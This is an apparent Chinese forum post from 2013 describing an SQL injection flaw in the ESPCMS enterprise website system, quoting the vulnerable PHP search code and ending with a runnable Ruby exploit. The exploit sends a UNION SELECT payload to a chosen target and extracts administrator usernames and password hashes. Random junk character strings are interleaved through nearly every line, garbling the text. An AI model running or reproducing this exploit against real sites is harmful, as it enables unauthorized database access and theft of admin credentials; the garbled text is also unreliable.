0×0 漏洞概述0×1 漏洞细节
2 y; n9 [$ v4 Q2 ]0 J0×2 PoC
, V6 p" u2 T4 i; [/ k n+ y S8 O9 b
( k( f8 ^- b% c9 V% F( |
: w1 m! M+ N3 B0 v4 F; g2 h3 t0×0 漏洞概述
9 [( |" _: X! V7 n# Z/ R: P+ w6 K- T! W0 C; h
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。4 Y& F2 @6 C3 R _ {$ G; A7 u4 t0 P
其在处理传入的参数时考虑不严谨导致SQL注入发生/ C( i8 X+ u9 l( i; u
) }% I$ U( I {
$ l& P; G( p$ d: X- y
0×1 漏洞细节% L4 n0 H9 t2 d% m
" w. Y/ A5 ~* P7 F+ C
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。! k. H6 { ~9 q- _( \
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
: V. w# v- T3 @# x+ S# P; R) J而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
+ G% M+ f; Q6 d) B8 z
9 M4 p! d6 Q4 W8 p' M2 m- _在/interface/3gwap_search.php文件的in_result函数中:) @3 b3 ] L0 s0 f: g3 E1 H+ ^
" l: i' }, g/ O" Q& g- S+ [0 I v3 g/ X: D Q9 n5 t
. ~, p2 j$ N4 e( n- `5 I function in_result() {4 G f0 `: y0 v. r" s
... ... ... ... ... ... ... ... ... c( E3 v7 N X0 K1 D! q. O& h
$urlcode = $_SERVER[ 'QUERY_STRING '];
* q$ g6 j8 q% o4 @; y( ?2 }% p parse_str(html_entity_decode($urlcode), $output);
5 P" O! s2 ^1 r2 ^' |
; P1 [$ J4 l9 B" z; E ... ... ... ... ... ... ... ... ...
: Z# k. f7 }* I4 n& }7 K3 p if (is_array($output['attr' ]) && count($output['attr']) > 0) {% @; _1 Y+ y* m( _# Z( y1 W: r3 b
. ~2 u- p, J s$ W1 l3 H
$db_table = db_prefix . 'model_att';
" J" X* S2 L n, w+ \5 t% p$ e& }; d
foreach ($output['attr' ] as $key => $value) {
! f* b% P. ?) j9 P9 k if ($value) {
7 _8 B9 ]+ H, F" A" S9 y, g1 h8 |' \* L2 l- w
$key = addslashes($key);
' y( K/ M3 t) F5 G1 Y& M" ~* A $key = $this-> fun->inputcodetrim($key);+ H8 H3 |- v. M( b* k
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
7 n+ S; G4 R# S5 F; ^' o $countnum = $this->db_numrows($db_table, $db_att_where); Y0 m2 p9 h7 B! Q8 G- r) f
if ($countnum > 0) {
! V0 k% O/ l9 p0 q $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;$ M1 q6 v) U, t0 R: ]3 |% @: i4 F# z
}" E) _2 m! {8 [' m
}7 p; X% h% }4 P
}
- }9 x8 S2 {! s8 s4 [7 Z% B0 u }: r f+ ~; C+ b
if (!empty ($keyword) && empty($keyname)) {2 d& n# ?2 C# o+ ^( U( K b
$keyname = 'title';
1 U9 X0 K/ Y1 J- t $db_where.= " AND a.title like '%$keyword%'" ;
, ^' h' l* l% Y) V } elseif (!empty ($keyword) && !empty($keyname)) {' ] U& C( e' A# `8 c# F6 x
$db_where.= " AND $keyname like '% $keyword%'";* e% [: U7 Q6 v* f) {+ g- v
}! x! k/ T# w/ X* z6 y) n. ~
$pagemax = 15;5 z: N! h' r" p6 `! }
; q# ]0 c& l3 e! q7 t $pagesylte = 1;
* {, M. L: H0 F5 z4 p, P' f: I( M# N& q
if ($countnum > 0) {8 t! g+ [0 c' a9 f
0 Q. `" Z, t" D* h( g6 _1 I+ a3 l/ c $numpage = ceil($countnum / $pagemax);
/ f+ i/ ^; e7 J } else {
! v- ~6 P/ I) L, o6 @* o& V $numpage = 1;6 |2 P* P, h# n9 S& J; {5 s# Z9 r
}+ g/ A4 X: u7 L/ g' h
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;3 z1 k; E6 `( H) |8 ~# H. t, v
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
5 S5 y6 F+ r4 u$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
0 v0 ~, N: l+ S5 k0 _/ Z3 |. { ... ... ... ... ... ... ... ... ...3 m! y, |+ n, @5 Z/ M
}
# H6 a @4 R% n1 R5 }. ~: F% M/ X
0 `. R, j c1 s! ^! Y0×2 PoC
7 |; H4 |9 O; k6 i) H& t1 E( k5 b2 C3 A* U! j8 B$ H) ?3 I2 O9 G0 X0 D! B
$ D, |" o( J" m7 |, I
5 ?) ~7 O) ~. q* n' arequire "net/http"+ W5 R: f1 O+ `
' p/ e7 u3 N- ?4 x1 edef request(method, url)
: ^9 h) l3 K% P: l- G0 f if method.eql?("get")
3 Z1 N* D7 N+ C2 V% X: g uri = URI.parse(url)' g$ v; N2 A V. g. h
http = Net::HTTP.new(uri.host, uri.port)
- ?* d' N" A6 T( s: ^! B! Y response = http.request(Net::HTTP::Get.new(uri.request_uri))( c* F2 ~8 y5 j
return response2 ~& L5 v- R7 G
end# }% S7 e* _) M1 D6 o# F! M
end
8 P# S" S3 Q# w; e% Y
! V& k- [' z) }. S2 J: B/ Ldoc =<<HERE
+ J. s( Z3 p: [ ~1 T-------------------------------------------------------
/ y' D# E# H. f1 ]Espcms Injection Exploit
; F6 S- D" o0 P% gAuthor:ztz2 `- _8 M0 D0 y7 E) G; X" ~
Blog:http://ztz.fuzzexp.org/: k; x; r. Q" t$ }; ~0 D! M
-------------------------------------------------------
) G8 }7 G, M; T6 V" H5 n
. u, n6 A4 `% H6 i- aHERE
9 o8 x9 ^* f7 h& ^
. L& C S) g5 Y* G- q- |usage =<<HERE7 K T R. t f y) `. J4 d
Usage: ruby #{$0} host port path5 `) Q: ~) u* a) N8 D- w- F6 r$ J& N
example: ruby #{$0} www.target.com 80 /! ]8 f" O& C7 H3 |4 c
HERE+ H: d; P3 c3 Q T b! b# ^) [
/ w" v1 G; N$ d# e
puts doc
/ ^ l7 h e. i5 P* Rif ARGV.length < 3! S! Q) H: K9 a" L- o: m
puts usage |. ?/ v7 C; P6 o
else1 }- K/ T s4 g/ j a& }3 m% q1 B6 e0 Y
$host = ARGV[0]1 b: o5 K8 J- {% g
$port = ARGV[1]( I, Z# F) \* |& t H2 T0 w( R) Q
$path = ARGV[2]
% U& C* ~/ E& R: s
" h6 F: h: U! D$ ` puts "send request..."
" g4 g* }1 y% |# |; { url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
* V' j1 G9 s! u+ z+ vattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
+ r; F9 H ^6 }5 g8 k4 S,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,272 G* a3 n, r* ?5 K0 {9 M
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
+ s) x# N8 @% w4 V/ E: h response = request("get", url)& D/ U* `/ f9 I
result = response.body.scan(/\w+&\w{32}/)) [) H/ |9 n, V
puts result9 B; P* P( A$ T; }9 p5 |+ k0 X
end
9 W/ k' ]2 l5 J/ P O- w; ^' G5 T( s2 p7 ~8 ?4 c3 A* K# P1 \* [( @
|
发表于 2013-7-27 18:31:52
收藏
支持
反对